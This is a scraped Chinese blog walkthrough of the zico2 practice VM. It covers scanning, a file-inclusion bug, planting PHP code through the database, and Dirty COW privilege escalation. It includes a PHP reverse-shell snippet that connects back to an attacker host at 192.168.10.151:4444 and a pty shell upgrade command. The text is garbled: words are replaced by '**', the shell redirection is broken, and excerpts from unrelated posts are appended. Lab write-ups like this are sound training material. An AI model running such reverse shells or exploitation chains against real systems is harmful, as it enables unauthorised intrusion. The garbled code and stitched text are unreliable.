kali滲透綜合靶機 五 zico2靶機

2022-07-03 20:39:10 字數 1636 閱讀 9182

kali滲透綜合靶機(五)--zico2靶機

一、主機發現

二、埠掃瞄

三、埠服務識別

四、漏洞發現

1.訪問發現可能存在檔案包含漏洞

2.測試是否存在檔案包含漏洞,下圖說明存在存在檔案包含漏洞

3.掃瞄**目錄

4.測試資料庫是否可寫內容,在資料庫插入 phpinfo();?>,然後結合檔案包含

然後結合檔案包含

5.在攻擊端寫**指令碼,然後在目標資料庫中寫入一段**載入位於攻擊端的**,結合檔案包含,然後在攻擊端開啟監聽

攻擊端**:

<?php

$sock=fsockopen("192.168.10.151",4444);exec("/bin/sh -i &3 2>&3");

?>

目標資料庫插入**:

6.新建乙個終端

python -c 'import pty;pty.spawn("/bin/bash")'

8. 然後編譯並執行,然後切換firefart賬戶,獲得管理員許可權

總結:1.資訊收集

2.檔案包含

3.髒牛提權

Web Pentester滲透靶機

下面分模組講解 檔案包含 很明顯這是乙個典型的包含,先在後面加個單引號,我們就可以得到物理路徑 下面我們看看能不能呼叫example.php中的動態包含函式包含passwd檔案內容 接著我們就可以利用他進行本地包含和遠端包含 我們還是先用單引號或者其他符號先去測試一下 還是會把我們的路徑爆出來,但是...

kali滲透靶機 實驗環境搭建資源 問題解析

一以下的內容是本人親自體驗所總結的,所用到的鏈結與資源均可放心使用,隨著本人自身學習的不斷深入,日後此篇文章會不斷地更新,讓我們共同進步共同發展 1 開啟bios 前提條件 bios已經虛擬開啟,如果未開啟,這裡檢視開啟步驟 進入bios不同的電腦品牌按鍵是不一樣的,檢視自己電腦開啟bios虛擬的按...

vulstudy靶機搭建(kali)

安裝docker apt get install docker.io 安裝docker pip install docker compose 安裝docker compose 使用主要分兩種 單獨執行乙個漏洞平台,同時執行多個漏洞平台 cd到需要執行的漏洞目錄下執行命令 cd vulstudy 漏洞...